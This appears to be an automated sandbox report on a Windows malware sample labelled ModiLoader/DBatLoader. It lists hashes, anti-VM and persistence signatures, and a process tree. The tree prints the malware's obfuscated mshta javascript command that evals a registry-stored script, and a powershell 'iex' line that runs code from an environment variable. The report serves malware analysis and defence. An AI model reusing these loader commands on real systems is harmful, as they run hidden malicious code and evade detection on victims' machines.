Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
16-05-2024 04:57
General
-
Target
497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe
-
Size
356KB
-
MD5
497f7d69be6c9ba572ad8096d762eed9
-
SHA1
38c86a5632b5e9ea39dbc21096b3401dc8944e75
-
SHA256
2f4dbe106abeb7bd9cb954ab1997d25cef95da32d614e6bb2cb962543d07b89f
-
SHA512
3434b179cd56847dc3f588ec7aec22622416848bdeb5c38f569cf0b616417aaeb7e3ac13698f1e64764816ac86383df26dac1fc5990590077bbf38dcde383083
-
SSDEEP
6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5i:W/cMVDxFu43cHYf1TPCAxjzMU
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 64 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 3 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VMWare Tools registry key
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\497f7d69be6c9ba572ad8096d762eed9_JaffaCakes118.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VMWare Tools registry key
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:jsEymSQ90H="N4WU";a3J9=new%20ActiveXObject("WScript.Shell");K7TXr9FpnC="fv57A8bDM";rA3ZT6=a3J9.RegRead("HKLM\\software\\Wow6432Node\\M0QDVtD\\oCHKIb");F7OQmWS5S="XOeEXo";eval(rA3ZT6);mETB2HOX="U7P";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:lousjjmc2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD52bd343bb964cf725dac91ac2e34e3bee
SHA1c6e9388f0ed466722631ac5fa9f15d2e3eca0db2
SHA256e9447ccbc9ee9c4a41a9fb57b5f3e094eeea4d95f76a3440de39ed1ef6ca4162
SHA512f5d3ea9c0f8ee66ae9d417b10b2d0d000babe3fbc0b11c6cd70ac0c5c0e94d0bb2b2b159cfd19e2aa08b354bc71a884d7a91ebff00a47a2e115bb49c5ff50279
-
Filesize
877B
MD54d1ae77a6903e358849a23f910595faa
SHA1d432c1efd61f723afc867ddb6515863bf8fb9684
SHA256b2caa9fc4a614bd92ce56468e42feabcdb9c626fb4d6c40938ce28cd57ce8511
SHA5123b5ef948b6902fe571fae5e25274efe8ede531af44c42a6999ee3e77e5eda18f124fc21c3ef57c882d08f0c58efc845821dd8c97d293dce8e2bc16e77c705647
-
Filesize
61B
MD5251c82732dbd03982f565deed73bb4f2
SHA12f903f60f1946953494fb995438cc2419abe59df
SHA2564b67bfb9575e3dffcba2ad2d0c3b194119b1671d0e079ca9a2ff85b177d438f2
SHA5121c6d1dd21ef660f870e23663b8f895f2255bf43830e93690217124a6b4a8cc563f97a4db145dd247b93bda3d49b7ef9d2ddf4ce58c72eccfb4609a356afd1344
-
Filesize
39KB
MD5e392662ed9d96ae13715f3f00dd95246
SHA1ed6f6c96f419ab63dcc35c12582b60a7fbc4e23c
SHA256f73aca02015cd2a97a46acbcc0b1ea3c8652ee14c432b2602b5c7022a1050fc1
SHA5129879e31edef5102361cd695f0912cd684489d4c32f6c915f2cdb79150e1a79e115f96bc3cd4c292952fd0630bb268bf24ed812d183683a5b98b12b08b382dbbb
-
Filesize
987B
MD5c389f0136803df92b057ca593bc2a3e8
SHA1fafda95114daaf02b2386f63a2119366a9dd0cd9
SHA2562980352428bc2fe33e6c35662a8285dfab805fa2bd8402d34404d2e5a73f24e1
SHA512d16e8ec8a2a93dbba2627fada5eda26829a4a8b19df35270c5bd9ee6bad22d92509386305e4eb39f482198b562ce64c6120870480b29690b9b4e411259ac1817
-
Filesize
356KB
MD5497f7d69be6c9ba572ad8096d762eed9
SHA138c86a5632b5e9ea39dbc21096b3401dc8944e75
SHA2562f4dbe106abeb7bd9cb954ab1997d25cef95da32d614e6bb2cb962543d07b89f
SHA5123434b179cd56847dc3f588ec7aec22622416848bdeb5c38f569cf0b616417aaeb7e3ac13698f1e64764816ac86383df26dac1fc5990590077bbf38dcde383083
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
284KB
-
Filesize
848KB
-
Filesize
248KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
848KB
-
Filesize
248KB
-
Filesize
20KB
-
Filesize
28KB
-
Filesize
284KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
32.0MB
-
Filesize
848KB
-
Filesize
848KB